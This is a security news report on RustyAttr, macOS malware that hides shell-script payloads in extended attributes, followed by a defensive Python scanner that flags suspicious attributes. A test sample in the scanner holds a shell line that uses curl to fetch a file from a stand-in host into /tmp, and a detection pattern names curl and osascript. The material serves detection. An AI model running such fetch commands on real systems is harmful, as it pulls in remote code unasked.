New RustyAttr Malware Targets macOS Through Extended Attribute Abuse


Threat actors, suspected to be the North Korea-linked Lazarus Group, have been exploiting a new technique that abuses macOS extended attributes to smuggle malware called RustyAttr. Singaporean firm Group-IB identified this activity, noting overlaps with the earlier Lazarus campaign RustBucket. The malware stores its payload in extended-attribute metadata and uses applications built with the Tauri framework, signed with a leaked certificate that Apple has since revoked, to fetch and execute shell scripts from it. The applications display decoy messages or documents while malicious JavaScript retrieves the hidden payload and executes it through a Rust backend. A successful attack requires the user to override macOS security protections, which social engineering may help bring about. The campaign's ultimate objectives remain unclear.
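Because the payload described above lives in extended attributes rather than in a file's contents, a file-content scan misses it; the attribute listing itself is the artifact to inspect. The following is an added defender-side example, not code from the report or from Group-IB: it classifies one file's extended attributes, flagging names outside a (assumed, non-exhaustive) allowlist of attributes macOS writes itself and values that look like shell scripts, and walks an `.app` bundle where Python exposes `os.listxattr`. The sample attribute sets and the `example.script` name are constructed for the demonstration.

```python
"""Flag script-like payloads stored in extended attributes (added example)."""
import os
import re

# Attribute names macOS itself routinely writes. This allowlist is an
# assumption for the example, not a definitive list; extend it per fleet.
KNOWN_APPLE_ATTRS = {
    "com.apple.quarantine",
    "com.apple.FinderInfo",
    "com.apple.ResourceFork",
    "com.apple.provenance",
    "com.apple.macl",
    "com.apple.lastuseddate#PS",
    "com.apple.metadata:kMDItemWhereFroms",
}

# Content markers typical of a shell script stashed in an attribute value.
SCRIPT_MARKERS = re.compile(rb"(^#!|/bin/(ba)?sh|/bin/zsh|\bcurl\b|\bosascript\b)")


def scan_attrs(attrs):
    """Classify a {name: bytes} mapping of one file's extended attributes.

    Returns a list of (attr_name, reason) findings; empty means nothing odd.
    """
    findings = []
    for name, value in attrs.items():
        if name not in KNOWN_APPLE_ATTRS:
            findings.append((name, "unexpected attribute name"))
        if SCRIPT_MARKERS.search(value):
            findings.append((name, "script-like content"))
    return findings


def read_attrs(path):
    """Read a file's attributes where Python exposes them (Linux has
    os.listxattr); on macOS, parse `xattr -l` output into the same dict."""
    if not hasattr(os, "listxattr"):
        return {}
    return {n: os.getxattr(path, n, follow_symlinks=False)
            for n in os.listxattr(path, follow_symlinks=False)}


def scan_bundle(bundle_path):
    """Walk an .app bundle; return {relative_path: findings} for flagged files."""
    report = {}
    for root, _dirs, files in os.walk(bundle_path):
        for name in files:
            path = os.path.join(root, name)
            hits = scan_attrs(read_attrs(path))
            if hits:
                report[os.path.relpath(path, bundle_path)] = hits
    return report


# Constructed samples: a normal quarantined download, and one carrying a script.
SAMPLE_CLEAN = {"com.apple.quarantine": b"0083;66b0c2a1;Safari;"}
SAMPLE_SUSPECT = {
    "com.apple.quarantine": b"0083;66b0c2a1;Safari;",
    "example.script": b"#!/bin/sh\ncurl -s http://example.invalid/p -o /tmp/p\n",
}

if __name__ == "__main__":
    print(scan_attrs(SAMPLE_CLEAN))    # []
    print(scan_attrs(SAMPLE_SUSPECT))  # two findings on 'example.script'
```

On a live macOS host, `xattr -l <path>` prints the same name/value pairs; feed them into `scan_attrs` to reuse the heuristics unchanged.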
